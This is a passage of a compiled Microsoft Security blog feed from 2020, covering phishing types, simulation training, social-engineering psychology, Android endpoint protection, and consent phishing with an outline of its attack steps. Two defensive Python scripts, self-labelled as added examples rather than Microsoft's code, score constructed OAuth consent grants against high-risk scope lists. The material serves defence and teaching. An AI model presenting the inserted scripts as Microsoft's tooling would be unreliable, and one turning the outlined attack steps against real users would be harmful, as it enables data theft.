The post Microsoft Security: 6 tips for enabling people-centric cybersecurity with security training appeared first on Microsoft Security.

How can Microsoft Threat Protection help reduce the risk from phishing?

August 26th, 2020 No comments

Microsoft Threat Protection can help you reduce the cost of phishing

The true cost of a successful phishing campaign may be higher than you think. Although phishing defenses and user education have become common in many organizations, employees still fall prey to these attacks. This is a problem because phishing is often leveraged as the first step in other cyberattack methods. As a result, its economic impact remains hidden. Understanding how these attacks work is key to mitigating your risk.

One reason phishing is so insidious is that attackers continuously evolve their methods. In this blog, I’ve described why you need to take phishing seriously and how different phishing methods work. You’ll also find links to Microsoft Threat Protection solutions that can help you reduce your risk.

Nearly 1 in 3 attacks involve phishing

According to Accenture’s Ninth Annual Cost of Cybercrime Study, phishing attacks cost the average organization USD1.4 million in 2018, an eight percent rise over 2017. This likely underestimates the cost because the report only considers four major consequences when determining the cost of an attack: business disruption, information loss, revenue loss, and equipment damage. However, phishing is used as the delivery method for several other attacks, including business email compromise, malware, ransomware, and botnet attacks. The 2019 Verizon Data Breach Report finds that almost one in three attacks involved phishing. And according to the Internet Crime Complaint Center’s 2019 report, phishing/vishing/smishing/pharming are the most common methods for scamming individuals online.

Since the costs of other attacks can often be attributed to phishing, a comprehensive cyber risk mitigation strategy should place a high value on phishing defenses and user education.

Phishing campaigns can be well-targeted and sophisticated

As attackers have developed new methods to evade detection by defenders and victims, phishing has transformed. Phishing now uses media other than email, including voicemail, instant messaging, and collaboration platforms, because people have strengthened email-based defenses but may not have considered these other attack vectors. The success of phishing as the delivery method for other cyberattacks makes it critically important for defenders to be able to identify the many types of phishing and how to defend against them, including:

  • Mass market phishing: When you think of phishing this is likely what comes to mind. These emails go out to a large group of people and use a generic message to trick users into clicking a link or downloading a file. Attacks often use email spoofing, so that the message appears to come from a legitimate source.
  • Spear phishing: Spear phishing is a more targeted social engineering method. Attackers pick an individual, such as a global administrator or an HR professional, conduct research, and then craft an email that makes use of that research to dupe the victim.
  • Whaling: These emails target someone on the executive team. Like spear phishing, these attacks start with research, which the attacker uses to write an email that appears legitimate.
  • Business email compromise: In these attacks, adversaries compromise an executive’s account, such as the CEO’s, and then use that account to ask a direct report to wire money.
  • Clone phishing: Attackers clone a legitimate email and then change the link or attachment.
  • Vishing: Vishing is a phishing attempt using the phone. Victims are asked to call back and enter a PIN or account number.

Fahmida Y. Rashid provides more details about these types of phishing attacks on CSO.

An emerging phishing method exploits the increase in remote work

Recently, another phishing type was identified called consent phishing. In response to COVID-19, people have increased their usage of cloud apps and mobile devices to facilitate work from home. Bad actors have taken advantage of this shift by leveraging application-based attacks to gain unwarranted access to valuable data in cloud services. By using application prompts similar to those on mobile devices, they trick victims into granting malicious applications permission to access services and data (see Figure 2).

Figure 1: Familiar application prompts trick users into giving malicious apps access to services and data.

The following best practices can help you defend against this new threat:

  • Educate your organization on how to identify a consent phishing message. Poor spelling and grammar are two indicators that the request isn’t legitimate. Users may also notice that the URL doesn’t quite look right.
  • Promote and allow access to apps you trust. Use publisher verification to identify apps that have been validated by the Microsoft platform. Configure application consent policies so employees are guided to applications you trust.
  • Educate your organization on how the permissions and consent framework works in the Microsoft platform.
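The three practices above translate into concrete signals a reviewer can check on each consent grant: which permissions were requested, whether the publisher is verified, whether an end user rather than an admin approved it, and whether `offline_access` lets the grant outlive the session. The Python below is an added example, not Microsoft's code and not the Azure AD app consent policy feature itself: it rates constructed consent-grant records (the record layout and the risk rules are assumptions made for the example; the scope names are Microsoft Graph delegated permissions) so that the consent-phishing shape, broad scopes from an unverified publisher, surfaces first.

```python
"""Flag risky OAuth consent grants of the kind consent phishing produces.

Added example, not Microsoft's code and not the Azure AD app consent policy
feature itself. The grant records and the risk rules are constructed for
illustration; the scope names are Microsoft Graph delegated permissions.
"""

# Graph delegated permissions that expose mail, files or directory data.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "Files.Read.All", "Files.ReadWrite.All",
    "Contacts.Read", "Directory.Read.All", "User.Read.All",
}
# A refresh token keeps the grant usable long after the user closes the page.
PERSISTENCE_SCOPES = {"offline_access"}
# Baseline scopes that almost every legitimate sign-in integration requests.
BENIGN_SCOPES = {"openid", "profile", "email", "User.Read"}

# Constructed grant records, shaped loosely like an audit-log export (assumed layout).
SAMPLE_GRANTS = [
    {"app_name": "Contoso Expense Portal", "publisher_verified": True,
     "consent_type": "user", "scopes": ["openid", "profile", "User.Read"]},
    {"app_name": "Payroll Notice (Q2)", "publisher_verified": False,
     "consent_type": "user",
     "scopes": ["openid", "offline_access", "Mail.Read", "Files.ReadWrite.All"]},
    {"app_name": "HR Document Viewer", "publisher_verified": False,
     "consent_type": "user", "scopes": ["openid", "User.Read"]},
    {"app_name": "Backup Connector", "publisher_verified": True,
     "consent_type": "admin", "scopes": ["offline_access", "Files.Read.All"]},
]


def assess_grant(grant):
    """Return (level, reasons) where level is 'low', 'medium' or 'high'."""
    scopes = set(grant["scopes"])
    high = scopes & HIGH_RISK_SCOPES
    beyond_baseline = scopes - BENIGN_SCOPES
    reasons = []
    if high:
        reasons.append("broad data access: " + ", ".join(sorted(high)))
    if scopes & PERSISTENCE_SCOPES:
        reasons.append("offline_access keeps the grant alive after sign-out")
    if not grant["publisher_verified"]:
        reasons.append("publisher not verified")
    if grant["consent_type"] == "user" and high:
        reasons.append("an end user, not an admin, approved high-risk scopes")

    if high and not grant["publisher_verified"]:
        level = "high"      # the classic consent-phishing shape
    elif high or (beyond_baseline and not grant["publisher_verified"]):
        level = "medium"    # worth a look: verified publisher, or unverified with modest scopes
    else:
        level = "low"
    return level, reasons


def risky_grants(grants):
    """Keep grants rated medium or high, in their original order."""
    return [g for g in grants if assess_grant(g)[0] != "low"]


if __name__ == "__main__":
    for g in SAMPLE_GRANTS:
        level, reasons = assess_grant(g)
        print(f"{level.upper():6} {g['app_name']}: {'; '.join(reasons) or 'baseline scopes only'}")
```

Rating on scopes and publisher status rather than on the app's display name matters because the name is exactly what the attacker controls; "Payroll Notice (Q2)" looks like the kind of internal tool a busy employee approves without reading the permission list.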

Office 365 Advanced Threat Protection helps prevent and remediate phishing attacks

Office 365 Advanced Threat Protection (Office 365 ATP) natively protects all of Office 365 against advanced attacks. The service leverages industry-leading intelligence fueled by trillions of signals to continuously evolve to prevent emerging threats, like phishing and impersonation attacks. As part of Microsoft Threat Protection, Office 365 ATP provides security teams with the tools to investigate and remediate these threats, and integrates with other Microsoft Threat Protection products like Microsoft Defender Advanced Threat Protection and Azure Advanced Threat Protection to help stop cross-domain attacks spanning email, collaboration tools, endpoints, identities, and cloud apps.

Microsoft Threat Protection increases analyst efficiency

Microsoft Threat Protection stops attacks across Microsoft 365 services and auto-heals affected assets. It leverages the Microsoft 365 security portfolio to automatically analyze threat data across identities, endpoints, cloud applications, and email and docs. By fusing related alerts into incidents, defenders can respond to threats and attacks immediately and in their entirety, saving precious time (see Figure 3).

The following actions will help you gain greater visibility into attacks to protect your organization.

Figure 2: Microsoft Threat Protection and Office 365 ATP provide several capabilities to help you protect your organization from phishing attacks.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How can Microsoft Threat Protection help reduce the risk from phishing? appeared first on Microsoft Security.

How to detect and mitigate phishing risks with Microsoft and Terranova Security

August 25th, 2020 No comments

Detect, assess, and remediate phishing risks across your organization

A successful phishing attack requires just one person to take the bait. That’s why so many organizations fall victim to these cyber threats. To reduce this human risk, you need a combination of smart technology and people-centric security awareness training. But if you don’t understand your vulnerabilities, it can be difficult to know where to start. Attack simulation training capabilities in Office 365 Advanced Threat Protection (Office 365 ATP) empower you to detect, assess, and remediate phishing risk through an integrated phish simulation and training experience. And, in October 2020, you can get true phishing clickthrough benchmarks when you register for the Terranova Security Gone Phishing Tournament™.

Terranova Security is a global leader in cybersecurity awareness training that draws on principles of behavioral science to create training content that changes user behavior. Through a partnership with Microsoft, Terranova Security is able to enrich our training programs with insights from the Microsoft platform, while Microsoft leverages our content and technology in Microsoft Office 365 Advanced Threat Protection (Office 365 ATP).

Today’s blog shares how the Gone Phishing Tournament helps you baseline against your industry and peers, and how Office 365 ATP Attack Simulation training can help you mitigate the risk of a phishing-related data breach.

How does your risk of being phished stack up?

Cybercriminals exploit human psychology to trick users, which is why they introduced COVID-19-themed phishing lures in the early days of the pandemic. Many employees are working from home for the first time and have children and other family members competing for their attention. Bad actors hope to trick employees when they are busy and stressed. Although it’s understandable why people accidentally act on phishing campaigns, there is an opportunity to turn your employees into your first line of defense. When people understand how phishing campaigns work, your organization is more secure.

An image showing typical malware campaigns before and after.

The Gone Phishing Tournament will give you valuable insight into how well employees understand phishing. The Gone Phishing Tournament is a free, annual cybersecurity event that takes place in October. The tournament leverages a phishing email based on real-world threats provided by Attack simulation training in Office 365 ATP and localizes it for your audience. After you register, you can select the users you want to include in the phishing simulation. We run the simulation for a set number of days using the same template, so you get an accurate assessment of how you compare to peer organizations. At the end of the tournament, you’ll receive a personalized click report and a global benchmarking report.

Empower employees to defend against phishing threats

Phishing simulations are a great way to educate employees about phishing threats, but to shift behavior you need a regular program that includes targeted education alongside simulations. Terranova Security’s awareness training, which will soon be available in Office 365 ATP, takes a pedagogical approach with gamification and interactive sessions designed to engage adults. It is localized for employees around the world and complies with web content accessibility guidelines (WCAG) 2.0.

Later this year, Office 365 ATP Attack Simulator and Training will launch integrated with Terranova Security awareness training. You’ll be able to take advantage of comprehensive training benefits that will help you measure behavior change and automate design and deployment of an integrated security awareness training program:

  • Simulate real threats: Detect vulnerabilities with real lures and templates for accurate risk assessment. By automatically or manually sending employees the same emails that attackers have used against your organization, you can uncover risk. Then, target users who fall for phish with personalized training content that helps them connect what they learned with real-world campaigns.
  • Remediate intelligently: Quantify social engineering risk across your employees and threat vectors to prioritize remedial training. Track your organization’s progress against a baseline and measure the behavioral impact of training. Using user susceptibility metrics, you can trigger automated repeat offender simulations and training for people who need extra attention.
  • Improve security posture: Reinforce your human firewall with hyper-targeted training designed to change employee behavior. Training can be customized and localized to meet the diverse needs of employees. Tailor simulations to your employees’ contexts—region, industry, function—with granular conditionality on harvesting. You can also cater to diverse learning styles and reinforce awareness with interactive nano learning and microlearning content.

In the new world of remote work, it has become clear that your people are your perimeter. Attack simulation training in Office 365 ATP, delivered in partnership with Terranova Security, can help you identify vulnerable users and deliver targeted, engaging education that empowers them to defend against the latest phishing threats. Look for a future blog from me at the beginning of cybersecurity awareness month that will discuss in more detail how to train your employees on security. In the meantime, register for the Terranova Security Gone Phishing Tournament October 2020.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to detect and mitigate phishing risks with Microsoft and Terranova Security appeared first on Microsoft Security.

Afternoon Cyber Tea: Revisiting social engineering: The human threat to cybersecurity

August 5th, 2020 No comments

Most of us know ‘Improv’ through film, theatre, music or even live comedy. It may surprise you to learn that the skills required for improvisational performance art can also make you a good hacker. In cybersecurity, while quite a bit of focus is on the technology that our adversaries use, we must not forget that most cybersecurity attacks start with a non-technical, social engineering campaign—and they can be incredibly sophisticated. It is how attackers were able to pivot quickly and leverage COVID-themed lures to wreak havoc during the onset of the global pandemic. To dig into how social attacks like these are executed, and why they work time and again, I spoke with Rachel Tobac on a recent episode of Afternoon Cyber Tea with Ann Johnson.

Rachel Tobac is the CEO of SocialProof Security and a white-hat hacker who advises organizations on how to harden their defenses against social engineering. Her study of neuroscience and Improv has given her deep insight into how bad actors use social psychology to convince people to break policy. I really appreciate how she is able to break down the steps in a typical social engineering campaign to illustrate how people get tricked.

In our conversation, we also talked about why not all social engineering campaigns feel “phishy.” Hackers are so good at doing research and building rapport that the interaction often feels legitimate to their targets. However, there are techniques you can use, like multi-factor authentication and two-factor communication, to reduce your risk. We also discussed emerging threats, like deep fake videos, attacks on critical infrastructure, and how social engineering techniques could be used against driverless cars. To learn why you should take social engineering seriously and how to protect your organization, listen to Afternoon Cyber Tea with Ann Johnson: Revisiting social engineering: The human threat to cybersecurity on Apple Podcasts or Podcast One.

What’s next

In this important cyber series, I talk with cybersecurity influencers about trends shaping the threat landscape and explore the risk and promise of systems powered by AI, Internet of Things (IoT), and other emerging tech.

You can listen to Afternoon Cyber Tea with Ann Johnson on:

  • Apple Podcasts — You can also download the episode by clicking the Episode Website link.
  • Podcast One — Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page — Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

To find out more information on Microsoft Security Solutions visit our website. In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.

The post Afternoon Cyber Tea: Revisiting social engineering: The human threat to cybersecurity appeared first on Microsoft Security.

Protecting your remote workforce from application-based attacks like consent phishing

July 8th, 2020 No comments

The global pandemic has dramatically shifted how people work. As a result, organizations around the world have scaled up cloud services to support collaboration and productivity from home. We’re also seeing more apps leverage Microsoft’s identity platform to ensure seamless access and integrated security as cloud app usage explodes, particularly in collaboration apps such as Zoom, Webex Teams, Box and Microsoft Teams. With increased cloud app usage and the shift to working from home, security and how employees access company resources are even more top of mind for companies.

While application use has accelerated and enabled employees to be productive remotely, attackers are looking at leveraging application-based attacks to gain unwarranted access to valuable data in cloud services. While you may be familiar with attacks focused on users, such as email phishing or credential compromise, application-based attacks, such as consent phishing, are another threat vector you must be aware of. Today we wanted to share one of the ways application-based attacks can target the valuable data your organization cares about, and what you can do today to stay safe.

Consent phishing: An application-based threat to keep an eye on

Today developers are building apps by integrating user and organizational data from cloud platforms to enhance and personalize their experiences. These cloud platforms are rich in data but in turn have attracted malicious actors seeking to gain unwarranted access to this data. One such attack is consent phishing, where attackers trick users into granting a malicious app access to sensitive data or other resources. Instead of trying to steal the user’s password, an attacker is seeking permission for an attacker-controlled app to access valuable data.

While each attack tends to vary, the core steps usually look something like this:

  1. An attacker registers an app with an OAuth 2.0 provider, such as Azure Active Directory.
  2. The app is configured in a way that makes it seem trustworthy, like using the name of a popular product used in the same ecosystem.
  3. The attacker gets a link in front of users, which may be done through conventional email-based phishing, by compromising a non-malicious website, or other techniques.
  4. The user clicks the link and is shown an authentic consent prompt asking them to grant the malicious app permissions to data.
  5. If a user clicks accept, they will grant the app permissions to access sensitive data.
  6. The app gets an authorization code which it redeems for an access token, and potentially a refresh token.
  7. The access token is used to make API calls on behalf of the user.

If the user accepts, the attacker can gain access to their mail, forwarding rules, files, contacts, notes, profile and other sensitive data and resources.
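The seven steps above end with an attacker-controlled app holding a token for the user’s data, and the only artifact a defender is guaranteed to see is the consent grant itself. The following Python is an added example (not code from the post or from Microsoft) that triages consent-grant records the way an analyst would after reading this section: it flags grants that request scopes reaching the mail, forwarding-rule, file, contact and note data listed above, grants to apps whose publisher is not verified, and grants to apps whose name imitates a product the organization already uses (step 2). The record shape, the list of high-risk scopes, and the trusted app names are this example’s assumptions; the events are constructed, and the scope names are Microsoft Graph delegated permissions.

```python
import json
from difflib import SequenceMatcher

# Microsoft Graph delegated permissions that reach the data the post lists
# (mail, forwarding rules, files, contacts, notes). offline_access is included
# because it yields a refresh token, i.e. long-lived access (step 6 above).
# Which scopes count as "high risk" is this example's assumption, not a Microsoft list.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "MailboxSettings.ReadWrite",   # mailbox forwarding rules are managed through this scope
    "Files.Read.All", "Files.ReadWrite.All",
    "Contacts.Read", "Notes.Read.All",
    "offline_access",
}

# Apps a hypothetical organization actually uses; a near-match name is a spoofing signal.
TRUSTED_APP_NAMES = ["Microsoft Teams", "Zoom", "Box", "Webex Teams"]

# Constructed consent-grant records in a simplified shape (not the real audit-log schema).
SAMPLE_EVENTS = [
    {"user": "alice@contoso.example", "app": "Risky App", "publisher_verified": False,
     "permissions": ["Mail.Read", "MailboxSettings.ReadWrite", "offline_access"]},
    {"user": "bob@contoso.example", "app": "Microsoft Team5", "publisher_verified": False,
     "permissions": ["User.Read", "Files.ReadWrite.All"]},
    {"user": "carol@contoso.example", "app": "Zoom", "publisher_verified": True,
     "permissions": ["openid", "profile", "User.Read"]},
    {"user": "dave@contoso.example", "app": "Zoom", "publisher_verified": False,
     "permissions": ["User.Read"]},
]

SEVERITY_ORDER = {"high": 0, "medium": 1, "low": 2}


def is_lookalike(name, trusted=TRUSTED_APP_NAMES, threshold=0.8):
    """True when `name` closely resembles a trusted app name without matching it exactly."""
    n = name.strip().lower()
    return any(
        n != t.lower() and SequenceMatcher(None, n, t.lower()).ratio() >= threshold
        for t in trusted
    )


def assess_consent(event, trusted=TRUSTED_APP_NAMES):
    """Score one consent grant and record every reason it was flagged."""
    name = event["app"]
    risky = sorted(set(event["permissions"]) & HIGH_RISK_SCOPES)
    unverified = not event["publisher_verified"]
    reasons = []
    if risky:
        reasons.append("high-risk scopes: " + ", ".join(risky))
    if unverified:
        reasons.append("publisher not verified")
    if is_lookalike(name, trusted):
        reasons.append("app name resembles a trusted app")
    elif unverified and name.lower() in {t.lower() for t in trusted}:
        # Exact name of a product the organization uses, but not from a verified publisher.
        reasons.append("app name matches a trusted product but publisher is not verified")

    if risky and unverified:
        severity = "high"       # sensitive data to an app nobody has vouched for
    elif reasons:
        severity = "medium"
    else:
        severity = "low"
    return {"user": event["user"], "app": name, "severity": severity, "reasons": reasons}


def triage(events):
    """Return the grants worth an analyst's attention, most severe first."""
    findings = [assess_consent(e) for e in events]
    findings = [f for f in findings if f["severity"] != "low"]
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f["severity"]])


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(json.dumps(finding))
```

Run stand-alone, the script reports three of the four constructed grants: “Risky App” and the lookalike “Microsoft Team5” as high severity, and the unverified app borrowing the exact name “Zoom” as medium; the verified Zoom grant with only sign-in scopes is left alone. In a real tenant the same logic would run over the consent events your audit log exports, with the trusted-app list and scope set tuned to what your organization actually uses.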

An image of a Consent screen from a sample malicious app named “Risky App."

Consent screen from a sample malicious app named “Risky App”

How to protect your organization

At Microsoft, our integrated security solutions from identity and access management, device management, threat protection and cloud security enable us to evaluate and monitor trillions of signals to help identify malicious apps. From our signals, we’ve been able to identify and take measures to remediate malicious apps by disabling them and preventing users from accessing them. In some instances, we’ve also taken legal action to further protect our customers.

We’re also continuing to invest in ways to ensure our application ecosystem is secure by enabling customers to set policies on the types of apps users can consent to as well as highlighting apps that come from trusted publishers. While attackers will always persist, there are steps you can take to further protect your organization. Some best practices to follow include:

  • Educate your organization on consent phishing tactics:
    • Check for poor spelling and grammar. If an email message or the application’s consent screen has spelling and grammatical errors, it’s likely to be a suspicious application.
    • Keep a watchful eye on app names and domain URLs. Attackers like to spoof app names that make it appear to come from legitimate applications or companies but drive you to consent to a malicious app. Make sure you recognize the app name and domain URL before consenting to an application.
  • Promote and allow access to apps you trust:
    • Promote the use of applications that have been publisher verified. Publisher verification helps admins and end-users understand the authenticity of application developers. Over 660 applications by 390 publishers have been verified thus far.
    • Configure application consent policies by allowing users to only consent to specific applications you trust, such as applications developed by your organization or from verified publishers.
  • Educate your organization on how our permissions and consent framework works:

The increased use of cloud applications has demonstrated the need to improve application security. At Microsoft, we’re committed to building capabilities that proactively protect you from malicious apps while giving you the tools to set policies that balance security and productivity. For additional best practices and safeguards review the Detect and Remediate Illicit Consent Grants in Office 365 and Five steps to securing your identity infrastructure.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Protecting your remote workforce from application-based attacks like consent phishing appeared first on Microsoft Security.

The psychology of social engineering—the “soft” side of cybercrime

June 30th, 2020 No comments

Forty-eight percent of people will exchange their password for a piece of chocolate,[1] 91 percent of cyberattacks begin with a simple phish,[2] and two out of three people have experienced a tech support scam in the past 12 months.[3] What do all of these have in common? They make use of social engineering: when an attacker preys on our human nature in order to defraud. Also in common, these small, very human actions have led to billions of dollars of loss to global business.

People are by nature social. Our decision making is highly influenced by others. We are also overloaded with information and look to shortcuts to save time. This is why social engineering is so effective. In this blog, I’ll share the psychology behind Cialdini’s Six Principles of Persuasion to show how they help lure employees and customers into social engineering hacks. And I’ll provide some tips for using those principles to create a social engineering resistant culture.

Dr. Robert Cialdini is Regents’ Professor Emeritus of Psychology and Marketing at Arizona State University and founder of Influence at Work. He has spent his entire career studying what makes people say “Yes” to requests. From that research he developed Six Principles of Persuasion: Reciprocity, Scarcity, Authority, Consistency, Liking, and Consensus. So let’s take a look at how each of these principles is used in social engineering campaigns and how you can turn them around for good.

Reciprocity

People are inclined to be fair. In fact, receiving a gift triggers a neurological response in the areas of the brain associated with decision-making. If my friend buys me lunch on Friday, I will feel obliged to buy her lunch the next time we go out. Social psychologists have shown that if people receive a holiday card from a stranger, 20 percent will send one back.[4] And providing a mint at the end of a meal can increase tipping by 18-21 percent.

How reciprocity is used in phishing: You can see evidence of the Principle of Reciprocity in phishing campaigns and other scams. For example, an attacker may send an email that includes a free coupon and then ask the user to sign up for an account.

Leveraging reciprocity to reduce phishing: According to Dr. Cialdini, the lesson of “the Principle of Reciprocity is to be the first to give...” Many organizations pay for lunch to get people to come to trainings, but you may also consider giving away gift certificates for coffee or a fun T-shirt. If the gift is personal and unexpected, it’s even more effective. After you give, ask people to commit to your security principles. Many will feel compelled to do so.

Scarcity

Why do so many travel websites tell you when there are only a few remaining flights or rooms? The Principle of Scarcity. It’s human nature to place a higher value on something that is in limited supply. In one experiment, college students judged cookies more appealing if there were fewer in the jar.[5] Even more appealing? When an abundant supply of cookies was later reduced to scarcity.

How scarcity is used in phishing: Attackers take advantage of our desire for things that seem scarce by putting time limits on offers in emails. Or, in another common tactic, they tell people that their account will deactivate in 24 hours if they don’t click on a link to get it resolved.

Leveraging scarcity to reduce phishing: You can leverage scarcity to engage people in security behaviors too. For example, consider giving a prize to the first 100 people who enable multi-factor authentication.

Authority

People tend to follow the lead of credible experts. Doctors (think Dr. Fauci), teachers, bosses, and political leaders, among others, have huge sway over people’s actions and behaviors. If you’ve heard of the Milgram study,[6] you may be familiar with this concept. In that study an experimenter convinced volunteers to deliver increasingly severe shocks to a “learner” who didn’t answer questions correctly. Fortunately, the learner was an actor who pretended to feel pain, when in reality there were no shocks delivered. However, it does show you how powerful the Principle of Authority is.

How authority is used in phishing: Using authority figures to trick users is very common and quite effective. Bad actors spoof the Chief Executive Officer (CEO) to demand that the Chief Financial Officer (CFO) wire money quickly in some spear phishing campaigns. When combined with urgency, people are often afraid to say no to their boss.

Leveraging authority to reduce phishing: You can use people’s natural trust of authority figures in your security program. For example, have senior managers make a statement about how important security is.

Consistency

Most people value integrity. We admire honesty and reliability in others, and we try to practice it in our own lives. This is what drives the Principle of Consistency. People are motivated to remain consistent with prior statements or actions. If I tell you that I value the outdoors, I won’t want to be caught throwing litter in a park. One study found that if you ask people to commit to environmentally friendly behavior when they check into a hotel, they will be 25 percent more likely to reuse their towel.[7]

How consistency is used in phishing: Scammers take advantage of people’s desire to be consistent by asking for something small in an initial email and then asking for more later.

Leveraging consistency to reduce phishing: One way to employ the Principle of Consistency in your security program is to ask staff to commit to security. Even more powerful? Have them do it in writing.

Liking

It probably won’t surprise you to learn that people are more likely to say yes to someone they like. If a friend asks for help, I want to say yes, but it’s easier to say no to a stranger. But even a stranger can be persuasive if they are perceived as nice. In the raffle experiment, people were more likely to buy raffle tickets if the person selling the tickets brought them a soda, and less likely if the person only bought themselves a soda.[8]

How liking is used in phishing: When bad actors spoof or hack an individual’s email account and then send a phishing email to that person’s contacts, they are using the Principle of Liking. They are hoping that one of the hacking victim’s friends won’t spend much time scrutinizing the email content and will just act because they like the “sender.”

Leveraging liking to reduce phishing: To be more persuasive with your staff, cultivate an “internal consulting” mindset. Be friendly and build relationships, so that people want to say yes when you ask them to change their behavior.

Consensus

When people are uncertain, they look to others to help them formulate an opinion. Even when they are confident of their beliefs, consensus opinions can be very persuasive. This can be seen in the light dot experiment. In this study, individuals were asked how much a (stationary) dot of light was moving. It appeared to move due to the autokinetic effect. Days later, the subjects were divided into groups. Despite very different earlier estimates, responses “normalized” to the broader group. If brought back to provide an individual estimate, individuals continued to provide the group estimate.[9]

How consensus is used in phishing: Adversaries exploit cultural trends. For example, when there is a natural disaster, there are often several illegitimate organizations posing as a charity to elicit donations.

Leveraging consensus to reduce phishing: Highlight positive security behaviors among other employees or report favorable statistics that indicate most people are complying with a security policy.

The more complex life becomes, the more likely humans will rely on cognitive shortcuts to make decisions. Educate your employees on how Cialdini’s Six Principles of Persuasion can be used to trick them. Try implementing the principles in your own communication and training programs to improve compliance. Over time, you can build a culture that is less likely to fall for social engineering campaigns.

Watch “The psychology of social engineering: the soft side of cybercrime” presentation at InfoSec World v2020.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter.

[1] Happ, Melzer, Steffgen. “Trick with treat – Reciprocity increases the willingness to communicate personal data.” https://dl.acm.org/citation.cfm?id=2950731
[2] “2016 Enterprise Phishing Susceptibility and Resiliency Report.” https://phishme.com/enterprise-phishing-susceptibility-report
[3] Microsoft. “Microsoft Global Survey on Tech Support Scams.” https://mscorpmedia.azureedge.net/mscorpmedia/2016/10/Microsoft_Infographic_final.pdf
[4] Kunz, Phillip R.; Woolcott, Michael (1976). “Season’s greetings: From my status to yours.” Social Science Research 5 (3): 269–278.
[5] Worchel, Stephen; Lee, Jerry; Adewole, Akanbi (1975). “Effects of supply and demand on ratings of object value.” Journal of Personality and Social Psychology 32 (5): 906–914.
[6] Milgram, Stanley (1963). “Behavioral Study of Obedience.” Journal of Abnormal and Social Psychology 67 (4): 371–378.
[7] Baca-Motes, Katie; Brown, Amber; Gneezy, Ayelet; Keenan, Elizabeth A.; Nelson, Leif D. (2013). “Commitment and Behavior Change: Evidence from the Field.” Journal of Consumer Research 39 (5): 1070–1084.
[8] Regan, Dennis T. (1971). “Effects of a favor and liking on compliance.” Journal of Experimental Social Psychology 7 (6): 627–639.
[9] Sherif, M. (1935). “A study of some social factors in perception.” Archives of Psychology 27: 187.

The post The psychology of social engineering—the “soft” side of cybercrime appeared first on Microsoft Security.

Microsoft continues to extend security for all with mobile protection for Android

June 23rd, 2020 No comments

Just a year ago, we shared our first steps on a journey to enable our customers to protect endpoints running a variety of platforms with our announcement of Microsoft Defender ATP for Mac. Knowing that each of our customers has unique environments and unique needs and is looking for more unification in their security solutions, we communicated our commitment to build security solutions from Microsoft, not just for Microsoft. Since then, we’ve announced capabilities for Linux servers, and at RSA we offered you a sneak peek into our mobile threat defense investments.

Today, I’m proud to announce the public preview of Microsoft Defender ATP for Android.

Protecting mobile devices from evolving threats, phishing attacks, unwanted apps

As more business is getting done on mobile devices, the lines blur between work and personal life. The threats here are unique. For example, one of the biggest and fastest growing threats on mobile is phishing attacks, the majority of which happen outside of email, such as via phishing sites, messaging apps, games, and other applications, and are tricky to spot on smaller form factors. Other common mobile threats include malicious applications that users are lured into downloading, as well as increased risk introduced by rooted devices that may allow unnecessary escalated privileges and the installation of unauthorized applications.

In this rapidly evolving world of mobile threats, Microsoft is taking a holistic approach to tackling these challenges and to securing enterprises and their data with our new mobile threat defense capabilities. We’re leveraging our unique visibility into the threat landscape and the vast signal, intelligence, and security expertise we have from across domains, such as our expertise in phishing and email, our endpoint threat research on malware and attacker techniques, and our focus on identity and zero trust to bring protection capabilities to mobile. Our integrated approach to security enables us to provide more complete coverage. Leveraging these capabilities, Microsoft Defender ATP for Android will help to protect our customers and their users by delivering:

  • Protection from phishing and access to risky domains and URLs through web protection capabilities that will block unsafe sites accessed through SMS/text, WhatsApp, email, browsers, and other apps. We’re using the same Microsoft Defender SmartScreen services that are on Windows to quickly detect malicious sites which means that a decision to block a suspicious site will apply across all devices in the enterprise.
  • Proactive scanning of malicious applications, files, and potentially unwanted applications (PUA) that users may download to their mobile devices. Our capabilities and investments in cloud-powered protection and intelligence on application reputation allow us to quickly detect sophisticated malware and apps that may display undesirable behavior.
  • Adding layers of protection to help prevent and limit the impact of breaches in an organization. By leveraging tight integration with Microsoft Endpoint Manager and Conditional Access, mobile devices that have been compromised with malicious apps or malware are considered high risk and are blocked from accessing corporate resources.
  • A unified security experience through Microsoft Defender Security Center where defenders can see alerts and easily get the additional context they need to quickly assess and respond to threats across Windows, Mac, Linux, and now mobile devices.

There’s more to share on how these capabilities work and how to get started on the blog in the Microsoft Defender ATP tech community.

In the coming months we will be releasing additional capabilities on Android and you will hear more from us about our investments in mobile threat defense for iOS devices as well.

I’m also thrilled to share that our initial release of Microsoft Defender ATP for Linux is now generally available. Customers have asked us to broaden our selection of platforms natively supported by Microsoft Defender ATP, and today we’re excited to officially start our journey with Linux. This release marks an important moment for all Microsoft Defender ATP customers when Microsoft Defender ATP becomes a truly unified solution to secure the full spectrum of desktop and server platforms that are common across enterprise environments: Windows, macOS, and Linux.

We are committed to helping organizations secure their unique and heterogenous environments and we have so much more in store for you this year. We’re excited for you to join us in our journey as we continue to deliver the industry’s best in integrated threat protection solutions.

For more information on Microsoft Security Solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

-Rob

The post Microsoft continues to extend security for all with mobile protection for Android appeared first on Microsoft Security.

11 security tips to help stay safe in the COVID-19 era

June 9th, 2020 No comments

The COVID-19 pandemic has changed our daily routines, the ways we work, and our reliance on technology. Many of us are now working remotely, students are attending classes virtually, and we’re relying more on social media and social networks to stay connected as we define what our new normal looks like.

